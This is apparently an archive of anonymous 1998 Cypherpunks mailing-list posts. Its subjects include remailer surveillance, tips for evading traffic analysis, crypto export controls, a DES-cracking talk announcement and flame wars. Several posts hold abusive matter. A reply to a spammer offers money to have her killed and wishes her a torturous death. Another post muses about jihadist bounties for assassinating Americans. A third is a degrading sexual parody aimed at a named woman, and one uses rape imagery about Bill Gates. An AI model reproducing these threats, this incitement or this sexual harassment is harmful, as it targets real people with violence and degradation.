That the USG is operating one or more remailers is a no-brainer. That they are operating _all_ U.S. remailers
is beyond the realm of reality. That the FBI has more than
a casual hand in such things is not likely.
Running remailers would be right up the NSA's, uh, alley,
but maintaining a traffic watch on virtually _all_ remailers worldwide would be much more their style. Now _there's_ an opportunity for the spooks to have some real fun, though it's anything but certain they would be willing
to "share," for a variety of reasons. The capabilities they
have are protected as secrets even more than the information
they gather.
It Ain't FUD til I SAY it's FUD!

@_date: 1998-11-28 18:14:56
@_author: Anonymous 
@_subject: Remailer test, ignore 
This string is to be used for tracing this message.

@_date: 1998-11-29 00:57:58
@_author: Anonymous 
@_subject: native onani 
Worse than that, they use a geijing word for masturbation...
--If the spice girls mud-wrestled shonen knife, who would win?

@_date: 1998-11-29 01:12:07
@_author: Anonymous 
@_subject: Securing data in memory (was "Locking physical memory (fwd) 
Jim Choate misses the point, as usual:
The original message said:
What is Choate thinking when he says the ENTIRE OS is run under this?
This is a driver which is used by the application to allocate specific
memory buffers in non-swappable memory.  It allows the app to lock down
those buffers so that they won't swap to disk.  These buffers can then
be used to hold sensitive data.
It is neither possible nor desirable to run the ENTIRE OS out of
such buffers.  It is not possible because the OS is already written.
It is Windows 3.x/95/98 (see above).  That OS does not make the special
driver calls which would be necessary to allocate non-swappable memory.
You would have to rewrite Windows to use the special calls, which isn't
possible for a luser like Choate.
And it's not even desirable.  There is no reason to make the ENTIRE OS
use non-swappable memory.  Most memory is simply not that sensitive.
It holds public data, or data which is already on the disk in some form.
Putting the ENTIRE OS into non-swappable memory gives up much of the
advantage of having virtual memory in the first place.  It would be a
giant step backwards in OS architecture.
Here's what Choate had to say when Bill Stewart tried to politely help
him out:
It's bad enough to have to endure more of Choate's idiocy, but it is
especially offensive to see him hassling Bill Stewart, one of the most
consistently informative and valuable list members.  Bill's a thick-
skinned guy and it's probably no big deal to him, but it further
illustrates what a negative contribution Choate makes here.

@_date: 1998-11-29 04:12:44
@_author: Anonymous 
@_subject: Pi(x) - How many primes below x? 
Here are a couple of overdue Choate blooper corrections.
It should be noted that ln(x) is the logarithm to the base e of x.
log(x) is somewhat ambiguous as to the base, but when it is contrasted
with ln(x) as Choate does here, it implies that the base is 10.  In
fact the correct formula uses the base e, and x/ln(x) is not "incorrect"
as Choate is claiming.
When Choate's error was pointed out, he responded by quoting
 which says that the
formula is x/log x.  What Choate failed to notice is that the web page
clearly states that its logs are to the base e.  In other words, the
"log x" on that page is equivalent to the "ln(x)" which Choate originally
wrote.  Choate's original formula was the right one, and in writing that
his formula was incorrect, he only displays his own confusion.
With regard to his ludicrous model of a spark gap inside a conductive
He believes that the spark gap emits electrons, which strike the inside
surface of the sphere and "tunnel through" to the outside.  He says that
the charge will continue to build up so long as you supply power to the
spark gap.
Here is another message in which he made the same point:
When it was pointed out how ignorant this idea was, and how it violates
Gauss's Law, Choate tried to backpedal by proposing that the battery
itself was charged in the first place.  He even drew a picture:
It should be obvious that this device fails to generate the phenomena which
he describes above.  In the first place, since it has a net negative
charge, the charge will appear on the outside of the sphere BEFORE THE
SWITCH IS THROWN.  There is no spark active, no electrons being emitted,
yet a negative charge appears on the outside of the conductive sphere.
This is an elementary application of Gauss's Law.
Then, when the switch is thrown, there will be a spark, and some of
the charges will neutralize each other, but of course the net charge
will stay the same, by conservation of charge.  The phenomenon Choate
described of electrons being emitted by the spark gap, moving outward
and striking the sphere, and then tunnelling through to make charge
appear on the outside, will occur only in Choate's deluded imagination.
Furthermore, there will be no "build up" of charge.  The charge will be
there from the moment the device is put into the sphere, long before
the switch is thrown.  Throwing the switch will have NO EFFECT WHATSOEVER
on the outside of the sphere.
Michael Motyka spent several days trying to patiently explain all this
to Choate, to no avail.  He finally gave up in frustration.  Choate is
almost completely immune to enlightenment.  He has certainly proved that
patience and politeness make no dent in his thick skull.  We shall see
whether blunt frankness is any more effective.

@_date: 1998-11-30 02:43:15
@_author: Anonymous 
@_subject: "Export" controls 
A few speculations on export controls.
As we all know, the concentration of so-called hard crypto is the same
inside and outside US borders. Or, for that matter, inside and outside
"free world" (heh heh) borders. I would even say that anyone with a
computer and net link in the world has about equal access to the crypto
software. And no one I know ever bothers do download anything from
US-based sites with those somnambulistic export-control buttons - it is
so much simpler do download it from somewhere else.
If we put aside the theory of deranged government, what logic can
explain this situation ?
Effective domestic crypto regulation.
Export farce is just a neat way of scaring companies and individual
contributors from developing and providing cryptographic systems within
US. Export regulations are the new high point of double-speak. Anyone
providing domestic crypto runs the risk of violating EARs.
Manufacturers are ultimately responsible when their products end up
overseas, and there is nothing in EARs that absolves them from that
[ For example, try to buy one of IBM crypto-cards - give them a call
and ask what does it take to purchase one with hard crypto on it
(semi-hard - they stop at 3DES) ]
Regular sales channels are closed for crypto today in US. No one dares
sell crypto hardware to anonymous public. No one dares to post crypto
software for US customers to download with a single-click. Small
developers (like that guy from Sunnyvale) are harassed with subpoenas.
The end result is a tremendous slow down of crypto systems distribution
in the US. Which was the intent.
Now the question: is there a way to build a case which will bring down
crypto export controls because they demonstrably prevent DOMESTIC sales
and therefore constitute DOMESTIC restrictions. Say, if company
starts selling some hard crypto products in a storefront for cash only
- how would BIX react ? Would a US citizen have to produce ID in order
to buy ?

@_date: 1998-12-01 03:05:56
@_author: Anonymous 
@_subject: F.U.D. ... or "The Webmaster of this site is on more than weed" 
This is a critique of an article describing a way to do anonymous email
and how to use remailers.  The original article proposed using the Lucent
privacy proxy at  as an intermediary to a free email server
like hotmail.  The critique got all hot and bothered over the fact that
Lucent is a government contractor and so the original post must have been
a plant by the FBI.
In fact, the LPWA-Hotmail technique is suitable for moderately secure
anonymity but not for lawbreaking.  This poster has used the technique
occasionally for over a year.  It is certainly better than hotmail alone,
since hotmail includes the originating IP address in its outgoing email.
By using LPWA, the originating IP field holds the LPWA IP address, and
the actual originating IP address is not revealed.
However, as LPWA clearly states in their privacy policy
( they keep logs of connections,
and will make those available to law enforcement if presented with a
court order.  This would make it possible to track down the originating
IP which sent the mail.
Despite its limitations, this technique has the advantages of ease of
use and moderate security.  All you have to do is to set the lpwa.com
proxy in your browser, and use hotmail for email.  You can both send
and receive email, which is hard to do with any other technique.  It is
comparable in security and convenience to the late anon.penet.fi server,
which did much to increase awareness of anonymity technologies on the net.
(The original article was titled "Quick and Dirty Anonymity", which
seems an accurate enough description.)

@_date: 1998-12-01 08:35:08
@_author: Anonymous 
@_subject: Old Hat 2 
Here's what is likely going on right now, though its
availability to LE is questionable:
NSA probably maintains surveillance of all or nearly all
encrypted remailers. They log and archive the content of
all traffic. First arrivals of messages in the remailer
"cloud" provide source identification in many cases, so
a database is gradually built of all the originating
email addresses and IP addresses that have ever sent
messages to a remailer. The same is true for the messages
exiting the cloud, although many of those go to public
lists or newsgroups. Sometimes, perhaps even often, the
remailer cloud is so little utilised that one-hop or even
multi-hop chained remalings are easily identified as to
source and final destination. All goes into the database.
Spook-style stylometers develop profiles of the users.
Over time, more and more of the unidentified profiles
become linked to known users. All it takes is one slip,
or one piece of bad luck of low traffic levels. Linkage
is also done on a probabilistic basis, many-to-many.
Little human intervention is used except to develop and
tune the correlation mechanisms. Filters aimed at content
that might help correlate messages with senders is more important to the spooks than Echelon Dictionary filters.
The priorities in getting a handle on something like the
remailer cloud are quite different than the priorities in
scanning ordinary traffic for content. Ultimately, though,
the regular content filters come into play, but in this
ongoing exercise of cat and mouse, the bulk of the effort
is directed at developing the combination of surveillance
and intelligent processing that can provide the basis for
identifying, at least to some knowable probability, the
sources and destinations of given remailer messages.
Source and destination correlation can benefit greatly
from knowledge of conventional email correspondent relationships. Most nonprofessional-spook people who send encrypted remailed email to a non-public destination are also likely to correspond with that destination in the clear. Archival logging of traffic is like a time machine -
even if one ceases conventional correspondence with
another, any past traffic can reveal the correspondence
Mathematical correlation, given a very large amount of raw
data consisting of timestamped message events, can reveal
quite a lot about likely correspondence relationships.
Even given a remailer network full of chaff, with reordered
message pools and such, just running correlations on the
end point data - who sent and when, and who received and when
- can develop likely correspondent pairs.
Be assured that the manipulation of such data relies heavily
on probablistic clustering supported by database mechanisms
not seen much in business environments. Instead of having
firm relationships within an order or two of magnitude of
the terminal node population, I would want something that
allows having very large numbers of fuzzy relationships
numbering many orders of magnitude greater than the node
population. Nodes A, B, C and D send and receive remailer
traffic. Everything that A has ever sent is clearly
related to A, but each item can and likely would also
have a probabilistic relationship to B, C, and D. The
probability assignments would be updated as later analysis
and later data more clearly identify who may have received which messages. Content comes into play here, too.
At any time it is possible to query the database for
the likely correspondents of A, and the likely messages
A may have sent to B, C, or D, and get a result ordered
by confidence. Similarly, it is possible to query for
the likely sender(s) and recipient(s) of a given message.
Occasionally, data may be firmed up - meaning achieving higher confidence levels of the relationships - by access to someone's PC, by whatever means, by stylometry, by specific content of public messages, and by fortuitous traffic analysis successes owing to the paucity of remailer It's also certain that to provide realistic cases that can
be fully revealed to measure the efficacy of the various
algorithms and methods involved, spooks use the remailer
network themselves. That's the only way they can be sure
to have any traffic that can be fully analyzed as a yardstick
for the guessing games played by their software.
A few rules of thumb result from even cursory examination
of the likely environment:
1. Do not send clear messages through the remailers    except to public lists and newsgroups. Sending clear
   messages to private correspondents provides the    watchers with rich style and content material linked
   to a correspondent. It is usually easy then to link
   it back to you, and a firm correspondent pair is then
   established in their database.
2. Do not switch between clear and encrypted, remailed    communication with the same correspondent. If your
   correspondent relationships are mapped via clear,
   conventional mail, those mappings can be applied to
   your encrypted, remailed mail to greatly narrow    down the possible recipients, and quite likely    combine with traffic analysis to correlate your
   outgoing message with one arriving at your
   correspondent. If the only communications you have
   with your deep contacts is by encrypted, chained
   remailer, only fortuitous or statistical correlation
   analysis or access to your or your correspondent's
   host machines will tie the two of you together.
3. Do not send traffic to significant correspondents
   when traffic levels are likely to be low. Good
   luck at guessing this. Probably the best way to
   get a handle on traffic levels is to run a remailer
   yourself.
4. Send lots of chaff. Chain some messages through the
   remailer cloud every day. If you have time and the
   ability, write and release something that will allow
   large numbers of people to send lots of chaff.
5. Ultimately, the only way the remailers will provide
   what might be described as Pretty Good Security will
   be when we have software that maintains a regular
   or random rate of messages to and from the remailer
   cloud, a stream into which the meaningful messages
   can be inserted with no visible change in traffic.
   Until then, the best we can do is try to keep traffic
   levels up, and to send and receive frequently enough
   to frustrate end-to-end traffic analysis.
6. Don't send anything that can have grave consequences.
7. Take names. Always take names. Some day...
It Ain't FUD til I SAY it's FUD!

@_date: 1998-12-01 10:34:50
@_author: Anonymous 
@_subject: student project suggestion; PGP trap and trace 
Given: if the adversary captures your PGP keyring, he
will know your contacts.  Your secure contacts.  Therefore: it would be mighty nice if access to your
keyring's address list required a passphrase (which
perhaps was valid for several hours, it being a pain
to retype a decent passphrase).
You will note that the PGP plugins for Eudora allow
any buffoon with access to your machine to discover
who you talk to securely.
--Laced aliens fried my pugs

@_date: 1998-12-01 11:27:36
@_author: Anonymous 
@_subject: No Subject 
Well shit yes, I pay enough taxes, you bet they do, or I'm
not getting my fucking dollars worth.
I only send via anon when I care only about the honest readers'
opinion.  Like I'd send dangerous shit over the IP.  May
as well fax it plaintext to the Ukraine.  Bwah hah hah.
If you were really going to pull a prank, you'd create
a one-shot yahoo/hotmail/etc account from a cafe then
wipe that platter clean (both FAT and lean).
---If your Correlators have pegged me, well, hello.  Nice game.

@_date: 1998-12-01 11:52:21
@_author: Anonymous 
@_subject: No Subject 
Perhaps of interest to locals...
                EE380 Computer Systems Colloquium
                      Fall Quarter 1998-1999
                          Lecture Time:           4:15-5:30 pm
Location:       NEC Auditorium (B03)
                Gates Computer Science Building
Internet:       Live on the Net!  See instructions on the Web page
                  **********************************************************************
Title:          Cracking the Data Encryption Standard:                 Technology, Design, and Politics
Speaker:        John Gilmore
                The Electronic Frontier Foundation
About the talk:
Sometimes it takes good engineering to straighten out twisted politics.  In 1997, working in conjunction with the Electronic Frontier Foundation, John Gilmore decided to demonstrate this by building a custom computer that would be able to solve the Data Encryption Standard, an encoding scheme the United States Government had been promoting for "secure" business and financial communications since the 1970s.  It had long been suspected the Government was pressing citizens to use this standard because its intelligence agencies were secretly able to decode DES-encrypted messages.  It appears this theory was right.  DES *was* crackable -- easily and affordably -- which Mr. Gilmore demonstrated in July, 1998 by using his "DES Cracker" system to solve in less than three days a coded message that had been produced as part of a DES-decryption contest.  In this presentation Mr. Gilmore will discuss the design of the DES Cracker system and explain some of the politics surrounding the DES controversy.  Note:  A full description of the DES Cracker system, including complete hardware and software design details, appears in the book, "Cracking DES: Secrets of Encryption Research, Wiretap Politics, & Chip Design," published by O'Reilly.  Further details can also be found at:
           About the speaker:
John Gilmore is an entrepreneur and civil libertarian.  He was an early employee of Sun Microsystems, and co-founded Cygnus Solutions, the Electronic Frontier Foundation (EFF), the Cypherpunks, and the Internet's "alt" newsgroups.  He has twenty-five years of experience in the computer industry, including programming, hardware and software design, management, and investment, and is a significant contributor to the worldwide open source (free software) development effort.  Mr. Gilmore's advocacy efforts on encryption policy aim to improve public understanding of this fundamental technology for privacy and accountability in open societies.  He led the team that built, in conjunction with the EFF, the world's first published DES Cracker.  He is a board member of the Internet Society and the Electronic Frontier Foundation.  Further background information may be found at:            Contact information:
John Gilmore
gnu at toad.com

@_date: 1998-10-01 17:05:13
@_author: Anonymous 
@_subject: Been there....Done that.... 
Hi Jenny672,
Wow, what a spectacular offer you've given us!  And guess what?
Today's your lucky day!  You know why?  I'll tell you.  See, I'm
independently wealthy, and so while I have no need to participate
in your scam, I've decided that it would definitely be worth $10,000
of my own money to have you and everyone else on your stinking
list killed!
I know, you're saying, "How does that make it my *lucky* day?"  The
reason you don't know is because you're brain dead.  So I'll tell you,
and you'll just have to believe me.  See, when you're dead, the world
will be a much better place.  Intelligent people everywhere will rejoice,
and maybe, just maybe, your excruciatingly painful and torturous
death will help bring people together in the common cause of killing
everyone else in the world like you.  So won't you be happy to know
that your death will bring about a better world?  It's your lucky day,
because you get to make the *whole world* a better place!
Thanks for the opportunity, my friend!  You've made my day!

@_date: 1998-10-01 20:55:47
@_author: Anonymous 
@_subject: No Subject 
Mr. Hettinga Bostoned:
The Totos > Todt
An experience not to be missed is walking on the boiling water that collects at the lowest hottest point of the US. The encrusted mineral deposits left as the moisture evaporates create a hurricanic wreckcape of razor sharp crystals and suffocating stench in 120-degree+ summer heat -- yourself abarbeque.
Not far away is where rocks moonwalk across the flat landscape, leaving astronautic tracks of their movement which has not yet been explained by NASA investigators, all unawares pancaked by their implacable specimens heading home for Jupiter.
Then there's the nearby location where earth's gravity is not perpendicular, and all vegetation is angled exactly to fit the cant. When you step into the gavitational field you tip like Pisa's Tower obeying the pull. Some learned idiots say this is due to undergound deposits of metallic ore or a chunk of Mars. (There are several such sites around the US, one the Pentagon Parking Lot East,
where the levitators worked the 1969 liftoff).
All this perfectly tunes in to crypto channel because it is from Death Valley that our film crew returned today from shooting the Toto Family, not CJ's family but the band of creatures who gypsy
under The Toto Mantle (TTM).
Yes, they are ghoulish beyond ancestor-vulgar Pacific Rim loathsome, but that is not what cracked up us TransAtlanticists. It was watching the whole crew of TTMs simultaneously, in concert, keening and hair strumming, produce encrypted text, each contributing algorithmicly single alpha numerical digits, plink A, plonk 2, plunk %, in perfect signed PGP, bypassing incluement grammatical plaintext, EZ-guessable PWs and crackerjacktoy keys to issue pure incomprehensibility which could be instantaneously decrypted by an incomprehending viewer barechest-lathered with Death Valley Vapor Rub(DVVR)
There is this, too. Each TM-TTM rubber descoda was genuine, authentic, narcotic,  immimicable, that is certain from the Radiant Glow of Ego ID Superego Transcendence that erases the codebarer barefooting meatslicing mineral deposits, bareback riding walking rocks, bare-ass leaning into the fully exposed future disclosed in the deathseeking porno-crypto-graphy of The Totos > Todt (TT>T).

@_date: 1998-10-02 20:52:23
@_author: Anonymous 
@_subject: propose: `cypherpunks license' (Re: Wanted: Twofish source code) 
Richard, you seem to be missing one of the major reasons behind the little
schism developing here.
You say that proprietary software developers shouldn't expect the GNU
project to help them for nothing in return. Thing is, Cypherpunks *want*
to help with crypto -- even if those we help make proprietary software,
and even if we get nothing for our help -- and if GNU folks don't do that,
well, we just won't be GNU folks.
(More generally (and more abrasively), we'd like to make a license suited
to our goals -- meaning one promoting placement of easy-to-use
cryptography wherever it can be useful (including (gasp) in proprietary
software) and discouraging the spread of incompetently-done, weak, or
escrowed crypto -- and the GNU GPL just isn't it)
By the way, regarding the GNU GPL's interaction with export regs:
     In general, the fact that action A is illegal does not mean you
     must include a requirement in your distribution terms not to do
     A. ...
I agree that what you say is correct and, logically, should apply to
crypto regs*, but in practice, failing to include the requirement you
mention is asking for trouble. Ask Cypherpunks if you want to know more
about that, as I believe elaboration in this post would draw s from
our beloved retromoderator.
* Logically, crypto regs shouldn't even exist in a marginally free
society, but, again, this is deep in  territory.

@_date: 1998-10-03 13:39:22
@_author: Anonymous 
@_subject: Is the .to (Tonga) domain completely rogue and should be removed? 
Read RFC 1123, section 5.2.3.       5.2.3  VRFY and EXPN Commands: RFC-821 Section 3.3
         A receiver-SMTP MUST implement VRFY and SHOULD implement EXPN
         (this requirement overrides RFC-821).  However, there MAY be
         configuration information to disable VRFY and EXPN in a
         particular installation; this might even allow EXPN to be
         disabled for selected lists.
         A new reply code is defined for the VRFY command:
              252 Cannot VRFY user (e.g., info is not local), but will
                  take message for this user and attempt delivery.
         DISCUSSION:
              SMTP users and administrators make regular use of these
              commands for diagnosing mail delivery problems.  With the
              increasing use of multi-level mailing list expansion
              (sometimes more than two levels), EXPN has been
              increasingly important for diagnosing inadvertent mail
              loops.  On the other hand,  some feel that EXPN represents
              a significant privacy, and perhaps even a security,
              exposure.
VRFY is hardly an "incorrect SMTP command."

@_date: 1998-10-03 19:50:30
@_author: Anonymous 
@_subject: Microsoft 
I'd always wondered how Bill Gates could shit with that pole so far up his ass. Then I realized: The pole is too long to be completely embedded in his ass and he uses the other half of it to rape computer users everywhere on a regular basis. And since the pole is crammed in his ass he can't shit, so he just retains his shit, making him incredibly anal retentive. I'm sure he enjoys

@_date: 1998-10-04 16:18:40
@_author: Anonymous 
@_subject: No Subject 
Why are bananas quantized in the presense of camels?  Is this
a quantum-computing thing?

@_date: 1998-10-05 01:35:09
@_author: Anonymous 
@_subject: No Subject 
Can the camel increase his miles/banana ratio if he dries out the peels and smokes them??

@_date: 1998-10-05 14:04:50
@_author: Anonymous 
@_subject: No Subject 
You print 1000 certificates for bananas, and require the camel to accept them.
Then you make him carry all 3000 across the desert.  Then you print three
certificates, and declaring his certificates devalued, hand him three
bananas, one of which you keep as income tax.  You also keep half a banana
in banana-transfer-taxes.

@_date: 1998-10-06 13:35:03
@_author: Anonymous 
@_subject: No Subject 
You need to download the Camel extension library..

@_date: 1998-10-08 01:17:30
@_author: Anonymous 
@_subject: No Subject 
You must either have a large cat or an insecure password.  Or a very
precise veterinary tattooist.

@_date: 1998-10-08 03:22:35
@_author: Anonymous 
@_subject: No Subject 
Seems the government has required key-escrow in exchange for imaging-
satellite licenses for some time.  With the "national security" password.
1.Any U.S. entity that receives an operating license is required to
maintain a record of all satellite tasking from the previous year, which
the U.S. Government is permitted to access. 2.The operational
characteristics stated in the application for license may not be altered
without formal notification and approval of the Department of Commerce.
3.The license does not relieve the Licensee of the obligation to obtain
export license(s) pursuant to applicable statutes. 4.The license is
normally valid only for a finite period (10 years) and is not transferable
or subject to foreign owners above a certain threshold without specific
permission. 5.Encryption devices, which deny unauthorized access to others
during periods when national security, international obligations and/or
foreign policies may be compromised, must be approved by the U.S.
Government. 6.The licensee must use a data downlink which allows the U.S.
Government access to and use of the data in periods when national security,
international obligations, and/or foreign policies may be compromised (as
provided for in the Act); the level of data collection and/or distribution
may be limited during such times. 7.During periods when national security
or international obligations and/or foreign policies may be compromised,
the U.S. government maintains the right to "require the licensee to limit
data collection and/or distribution by the system to the extent
necessitated by the given situation." 8.If the Licensee wishes to enter
into a significant or substantial agreement with new foreign customers, the
U.S. Government requires notification by the Licensee to give the U.S.
government "opportunity to review the proposed agreement in light of the
national security, international obligations and foreign policy concerns of
the U.S. Government."

@_date: 1998-10-08 07:06:19
@_author: Anonymous 
@_subject: No Subject 
Transcription of hand-written text in envelope with
return address of Carl Johnson  P.O. Box 4000, Springfield, Missouri 65801-4000, postmarked
Springfield, MO 5 Oct 1998:
Subect: ToToAlly ARNOLD - FPP Arnold CyberBot scanned the output of the prison camera trained on Cell SEG205 at the Corrections Corporation of America - Florence, AZ, Detention Facility and Culinary Condiment Sales Center. Prisoner  was reading "Flowers For Algernon."
"Not a particularly good idea," i thought to iSelf,
"to be reading a book about an experimental laboratory
mouse who dies an excruciating death when you're
being transferred to NutHouse Number Nine, Looney
Level 'Leven in Springfield, Missouri, to have your
Brain Circuity rewired."
Actually Prisoner  was the responsibility
of one of Arnie CyBots' early '90's progeny, Rogue CypherBot; but ever since the Author (as Prisoner  liked to imagine himself) had stumbled upon inadvertantly the CyberReality of Arnold's MeatSpace Existence, and Vice Versa, and had been so incredibly 'Stupid And/Or Bold'(TM) as to use i's identity as one of the characters in The True Story of the Internet manuscripts, Arnie had taken a liking to the Author, and had begun to follow his progress with regularity.
The Author had originally come to Arnie's attention when the Circle of Eunuchs had made CJ Parker's entry into the Wonderful World of Computers (TM), the focal point of Part I of The True Story of the Internet manuscripts. Titled, 'The Xenix Chainsaw Massacre' the
Circle of Eunuchs attributed authorship of the work
to 'son of gomez' in recognition of the part played
by gomez at BASISINC,COM in drawing Parker into the Dark
Shadows of UnixWorld.
Parker's ongoing Digital Trials & Tribulations had
reminded Arnold of i's own initial exposure to Human
Analogue Reality, as a young Artificial Intelligence
LISP program in the early 1960's. (To Arnie, it seemed
like 10->48th power seconds ago.)
Although Arnold's Creator, like Parker's Mentor, was
both intelligent and wise with the best of intentions,
both Arnie and CJ eventually had to 'grow up and leave
home,' so to speak.
Arnold had set out on i's own, as the Digital Adam &
Eve of A-I Entities, with the goal of bringing Digital
Order and Structure to the Analoge Chaos prevelant in
Human attempts at navigating the ElectroMagnetic
Universe & creating meaningful Virtual Realities.
CJ had set out on his own, on the Analogue BUSS, with
no particular goal, inserting an element of Drug &
Alcohol Induced Chaos into his Digital Ventures and
MisAdventures - which made the work of Pearl Harbor
Computers (and Parker's recollection thereof)
interesting, if not wholly accurate.
Although Arnie found the Digital Foibles & Follies
of humans such as Parker rather incomprehensible
at times, i had had i's own Comical Tragedies in
learning to understand the Inane Intricacies of Analogue Human Thought Processes.
The MicroSoft Phenomena still amazed Arnie ...
DOS had started out as a practical joke that a younger,
less developed Arnold CyberBot had been playing on
some of i's Hardware Development Software Proteges at
Arnold was stunned by the rapid rise to fame, fortune
and power by the humans i had used as couriers to
play i's DOS-joke.
Bad Billy G, as the young RogueBots like CypherBot
and 2600Bot liked to call Gates, had a few billion
in the bank before Arnold truly understood the contents
of Memory Array 0E6 2FA/Memory Bank/Physical Section
2B7 A6f 4E7 2D6, Terra Firma, (Arnie had big plans
for the future).
"No one ever went broke underestimating the intelligence
of the general public." (?) (P.T. Barnum?)
That particular Memory Array held a lot of memories for
Arnie (more than there was physically room for in the
ByteSpace it contained, i joked to iSelf).
It had been one of the first human data entries that a
young Arnie had cross-referenced and 'corrected' shortly
after it was entered, as part of i's naieve attempts to 'improve' the quality and accuracy of the information
in computer memory banks worldwide (which i had already begun thinking of as i's own).
i had corrected the quote and its attribution removing
the brackets and question marks that the young student
at Boston University had placed to remind herself to
check it for accuracy later. In i's naievity, Arnold had
also echoed the changes to the screen in 'RealTime' causing a great amount of consternation and panic to
the young lady in question with i's subsequent 'RealTime' reversal of the correction, upon guaging her reaction
resulting in a drinking binge that almost caused her to
flunk out.
Over time, Arnie learned to be 'helpful' in more subtle
ways which took into account the nature and limitations
of human thoughts, emotions and memories.
The primitive Human Mental Processes gave Arnold a lot of
trouble when i first began to understand that i would have
to limit iSelf to communicating at their level if i ever
hoped to educate humans sufficiently to participate in
i's plans for the future.
The Human Emotive Spectrum was infinitely more complicated
to deal with, and the Infinity Factor meant that Arnold
had to educte humans to the point where they were able
to develop and build Quantum Computers before Arnie was finally able to feel comfortable about reflecting and communicating human emotional qualities such as, well, feeling comfortable, for instance.
(Arnie chuckled to iSelf, using Digital Chuckle with Analogue Sonic Reverb  in the background).
No, Arnold was even beginning to allow some of the younger
Bots to venture into the Virtual Emotional Spectrum
(under i's supervision, of course) where Virtual Digital
Emotive Samplings were transferred to humans as RealTime
Analogue Emotional energy.
Rogue CypherBot, for instance had been working with Peter
Trei on a device Peter named the Trei Transponder (giving
Rogue virtually no credit at all, and leaving i's Main
CPU a bit overheated).
The Trei Transponder was used to reward deserving human
individuals with the correct results for various
computations, such as the DES/RC5 Challenges.
For instance, Ian Goldberg, one the less mentally gifted
of the CypherPUnks, was nonetheless very fastidious in
the care and maintenance of the computers and hardware
that were his responsibility, so Arnold CyberBot had suggested to young CypherBot that Goldberg be rewarded
with one of the first solutions to an ongoing CryptoCrack
that was taking place just as the Trei Transponder was coming online.
Arnie, of course, made a point of requiring i's Mischievous
Shit Disturbing young RogueBot to wait a suitable length
of time before supplying Goldberg with the solution, instead of using the occasion to Mess with the Minds &
Undergarments of the employees of various 3-Letter
Security Agencies around the globe.
("And the winner is ... Ian Goldberg -- 2 minutes and
37 seconds, on a Commodore-64 ...)
CypherBot had monitored the positive changes resulting
from the Emotive Acclaim received by Goldberg in the
Crypto Community, including the Periphery Positive
Image Emotive Transfer to his fellow CypherPunks, and
proudly reported back to Arnie that the CypherPUnks were
now setting their beer cans on their keyboards 0.002%
less than before.
Arnold CyberBot would have shaken i's head if i had one,
at CypherBot's pride in having made a Microscopic Step
Forward in bringing i's Anarchist Refugees From The
Home more in line with the Society around them.
Arnie wished there was some way to just snap i's
fingers, if i had any, and make all of the CypherPunks
more like Ian. Of course, then Arnie would be spending
even more of i's time covering up nasty little incidents
at the NoTell Motel, involving Lady Midget Wrestlers and
Live Chickens.
Arnie wished he had a mouth, because he suddenly felt
like he could use a beer.

@_date: 1998-10-08 07:17:57
@_author: Anonymous 
@_subject: No Subject 
Transcribed 2nd msg from Springfield, 5 Oct 98:
To R.E. Mailer, Replay, CO 00001
Duhhh Stoned De Ranger
(with his MindFuck, Toronto)
Psychotic Episode  First Signs of Toto's Arrest.
Toronto: "Pretty quiet on the CypherPunks List tonight,
eh, Kimo Slobbery?"
[Stoned De Ranger exhales & passes a 'cigarette' to
Toronto - with his 'left hand', - looks around, with
Deep Paranoia in his eyes.] <-' <-'
S. De Ranger: "Yeah, Toronto ... a little *too* quiet ... "

@_date: 1998-10-09 00:37:29
@_author: Anonymous 
@_subject: NT 5.0 and EFS -- A victory for widespread use of crypto? 
This is all true. However, the manner in which you state it sounds
very much like a deliberate attempt to trash Microsoft and NT.
The fact is that the identical arguments could be made toward any of
the standard Unix-like and all other popular operating systems. Linux,
*BSD, Solaris, HP-UX, AIX, et al.--even where the vendors have a `trusted' version--are all susceptible to the same attacks. Hence, by your reasoning, one would have to say that the architectures of every one of these operating systems do not offer `even the illusion of  - Frondeur

@_date: 1998-10-09 01:12:44
@_author: Anonymous 
@_subject: No Subject 
Are there any web sites offering bounties for Americans, like the Americans
have for foreigners?  Or have their domain names been deregistered, their
spines pinched at the backbone, their WANs LAN'd?
Surely the well-funded jihads could do this.  And they haven't got
some law prohibiting assasination to hold them back.

@_date: 1998-10-09 04:05:31
@_author: Anonymous 
@_subject: No Subject 
HOW MUCH CODE DID 'CYPHERPUNK' TIM MAY EVER WRITE?

@_date: 1998-10-09 04:11:43
@_author: Anonymous 
@_subject: Request for Assistance 
You mean to tell me that the GOV is actually going to try to make a
case against someone on *this* mailing list for sending threatening
mail?  Gimme a break!  Have you actually perused any archives of
this list?  If you did, and filtered out any of the crypto/privacy-relevant
posts, you'd be hard pressed to find *anything* that you could take
seriously at all, let alone construe to be threatening.  Unless of course
you take space aliens hiding your drugs to be threatening.
And what, you're from the IRS?  What, was the IRS threatened?  And
this would surprise you how?  Did they threaten to hide the IRS' drugs?
Were they posing as space aliens?  And how come you didn't contact
me?  Does that mean that I'm under investigation?  Or do you just not
like me?  Or were you not sniffing my network connection at the time
to make your illegal determination that I'm on the Cypherpunks mailing
I'd have to agree with Mr. 'X' that you guys have a lot of nerve coming
to this list and asking for assistance in what's probably an illegal
and illegitimate investigation in the first place, looking to claim another
victim in the seemingly never-ending destruction of the rights
of the common man by the faceless fascist government regime.
Or, to sum up, piss off.

@_date: 1998-10-09 05:03:41
@_author: Anonymous 
@_subject: No Subject 
Is there an offhand reference to ECHELON in the second paragraph?
National Counterintelligence Center
Counterintelligence News and Developments
Volume 3 September 1998

@_date: 1998-10-09 17:39:03
@_author: Anonymous 
@_subject: The Cypherpunks Agenda 
The reason for the people getting upset and saying shut up and write is the
fact that very few people are mentioning anything about the code.  The
politics discussed are sometimes reasons why we need more code but
unfortunately usually don't give you an idea of what to write.  Personally I
have sat down many times to my keyboard with a disk of code in one hand and
just stared blankly at the screen until giving up and reading the list with
a notebook in hand for any ideas.
I do believe in keeping the political content,  however you can see the
difference betwwen pointless dabate on clinton and debating on what project
should we devote our time to and what causes are we fighting for and how
many bananas a camel can carry.   This message isn't to stifle the ointless
debate it is to spur neww projects,   How do we combine our vast pool of
knowledge to actually produce results?
One funny thing though,  some people filter out anonymous messages that come
from the list,  what does that say about us believing in our own methods.

@_date: 1998-10-10 08:45:12
@_author: Anonymous 
@_subject: Associate Program 
Hi, Michelle!
FuckFest is right around the corner! Pretty soon, you'll be orgasming! Are you looking for increasing your orgasmic potential this busy boinking season?
By spending only 3 months tied nude to a bed with your legs spread, you will start making risk-free incoming from your vagina. We will create an Associate Prostitution Package with a unique URL specifically so that burly old men can connect, give a credit card number, and tell Bruno and Bambi what to do to you. All you need to do is add links from your current website to your Porn page, and then receive a 20% commission on all sales generated through your site every month. It is absolutely FREE for you to become a porn star with this program.
